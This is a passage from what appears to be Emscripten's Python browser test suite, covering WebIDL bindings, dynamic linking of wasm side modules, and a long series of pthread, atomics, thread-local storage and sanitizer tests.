path_from_root('tests', 'webidl', 'test.idl'),
'glue'])
self.assertExists('glue.cpp')
self.assertExists('glue.js')
for opts in [[], ['-O1'], ['-O2']]:
print(opts)
self.btest(os.path.join('webidl', 'test.cpp'), '1', args=['--post-js', 'glue.js', '-I.', '-DBROWSER'] + opts)
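# Test dynamic linking: a MAIN_MODULE loads side.wasm via Module.dynamicLibraries, both on the main thread and proxied to a worker.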
@requires_sync_compilation
def test_dynamic_link(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <emscripten.h>
char *side(const char *data);
int main() {
char *temp = side("hello through side\n");
char *ret = (char*)malloc(strlen(temp)+1);
strcpy(ret, temp);
temp[1] = 'x';
EM_ASM({
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = x;
Module.realPrint(x);
};
});
puts(ret);
EM_ASM({ assert(Module.printed === 'hello through side', ['expected', Module.printed]); });
REPORT_RESULT(2);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include <stdlib.h>
#include <string.h>
char *side(const char *data);
char *side(const char *data) {
char *ret = (char*)malloc(strlen(data)+1);
strcpy(ret, data);
return ret;
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
print('wasm in worker (we can read binary data synchronously there)')
create_test_file('pre.js', '''
var Module = { dynamicLibraries: ['side.wasm'] };
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '--proxy-to-worker', '-s', 'EXPORT_ALL=1'])
print('wasm (will auto-preload since no sync binary reading)')
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
# same wasm side module works
self.btest(self.in_dir('main.cpp'), '2', args=['-s', 'MAIN_MODULE=1', '-O2', '--pre-js', 'pre.js', '-s', 'WASM=1', '-s', 'EXPORT_ALL=1'])
# verify that dynamic linking works in all kinds of in-browser environments.
# don't mix different kinds in a single test.
def test_dylink_dso_needed_wasm(self):
self._test_dylink_dso_needed(1, 0)
def test_dylink_dso_needed_wasm_inworker(self):
self._test_dylink_dso_needed(1, 1)
def test_dylink_dso_needed_asmjs(self):
self._test_dylink_dso_needed(0, 0)
def test_dylink_dso_needed_asmjs_inworker(self):
self._test_dylink_dso_needed(0, 1)
@no_wasm_backend('https://github.com/emscripten-core/emscripten/issues/8753')
@requires_sync_compilation
def _test_dylink_dso_needed(self, wasm, inworker):
# here we reuse runner._test_dylink_dso_needed, but the code is run via browser.
print('\n# wasm=%d inworker=%d' % (wasm, inworker))
self.set_setting('WASM', wasm)
self.emcc_args += ['-O2']
def do_run(src, expected_output):
# XXX there is no infrastructure (yet?) to retrieve stdout from the browser in tests,
# so do the assert about the expected output inside the browser instead.
#
# We have to put the hook into post.js because in main() it is too late
# (in main we would not be able to catch what static constructors inside
# linked dynlibs printed), and in pre.js it is too early (out is not yet
# set up by the shell).
create_test_file('post.js', r'''
Module.realPrint = out;
out = function(x) {
if (!Module.printed) Module.printed = "";
Module.printed += x + '\n'; // out is passed str without last \n
Module.realPrint(x);
};
''')
src += r'''
int main() {
_main();
EM_ASM({
var expected = %r;
assert(Module.printed === expected, ['stdout expected:', expected]);
});
REPORT_RESULT(0);
}
''' % (expected_output,)
# --proxy-to-worker only on main
if inworker:
self.emcc_args += ['--proxy-to-worker']
self.btest(src, '0', args=self.get_emcc_args() + ['--post-js', 'post.js'])
super(browser, self)._test_dylink_dso_needed(do_run)
@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
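# Helper that builds a shell page which hides SharedArrayBuffer and Atomics, simulating a browser without shared memory support.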
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
args = opt + debug + f32
print(args)
if self.is_wasm_backend() and ('--separate-asm' in args or 'AGGRESSIVE_VARIABLE_ELIMINATION=1' in args):
continue
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=args + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs the chrome renderer, and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
@requires_threads
def test_pthread_attr_getstack(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_attr_getstack.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call sbrk(); the main thread then has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless test
# whether that kind of scheme works with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test customizing the location that the pthread worker.js file is loaded from (via Module.locateFile)
@no_wasm_backend('uses js')
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
if self.is_wasm_backend():
shutil.copyfile('test.html.mem', os.path.join('cdn', 'test.html.mem'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that if the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), this does not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_futex_wake(addr, INT_MAX) wakes all waiters
@requires_threads
def test_pthread_wake_all(self):
self.btest(path_from_root('tests', 'pthread', 'test_futex_wake_all.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'TOTAL_MEMORY=64MB', '-s', 'NO_EXIT_RUNTIME=1'], also_asmjs=True)
# Test that STACK_BASE and STACK_MAX correctly bound the stack on pthreads.
@requires_threads
def test_pthread_stack_bounds(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_stack_bounds.cpp'), expected='1', args=['-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls.cpp'), expected='1337', args=['-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-std=c++11'])
# Test that real `thread_local` works in main thread without PROXY_TO_PTHREAD.
@no_fastcomp('thread_local is only supported on WASM backend')
@requires_threads
def test_pthread_tls_main(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_tls_main.cpp'), expected='1337', args=['-s', 'USE_PTHREADS', '-std=c++11'])
@no_fastcomp('-s SAFE_STACK is only supported on WASM backend')
@requires_threads
def test_pthread_safe_stack(self):
self.btest(path_from_root('tests', 'core', 'test_safe_stack.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'SAFE_STACK', '-s', 'DEFAULT_PTHREAD_STACK_SIZE=64KB', '--pre-js', path_from_root('tests', 'pthread', 'test_safe_stack.js')])
@parameterized({
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('LSan is only supported on WASM backend')
@requires_threads
def test_pthread_lsan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=leak', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@parameterized({
# Reusing the LSan test files for ASan.
'leak': ['test_pthread_lsan_leak', ['-g4']],
'no_leak': ['test_pthread_lsan_no_leak'],
})
@no_fastcomp('ASan is only supported on WASM backend')
@requires_threads
def test_pthread_asan(self, name, args=[]):
self.btest(path_from_root('tests', 'pthread', name + '.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', name + '.js')] + args)
@no_fastcomp('ASan is only supported on WASM backend')
def test_pthread_asan_use_after_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.cpp'), expected='1', args=['-fsanitize=address', '-s', 'TOTAL_MEMORY=256MB', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-std=c++11', '--pre-js', path_from_root('tests', 'pthread', 'test_pthread_asan_use_after_free.js')])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
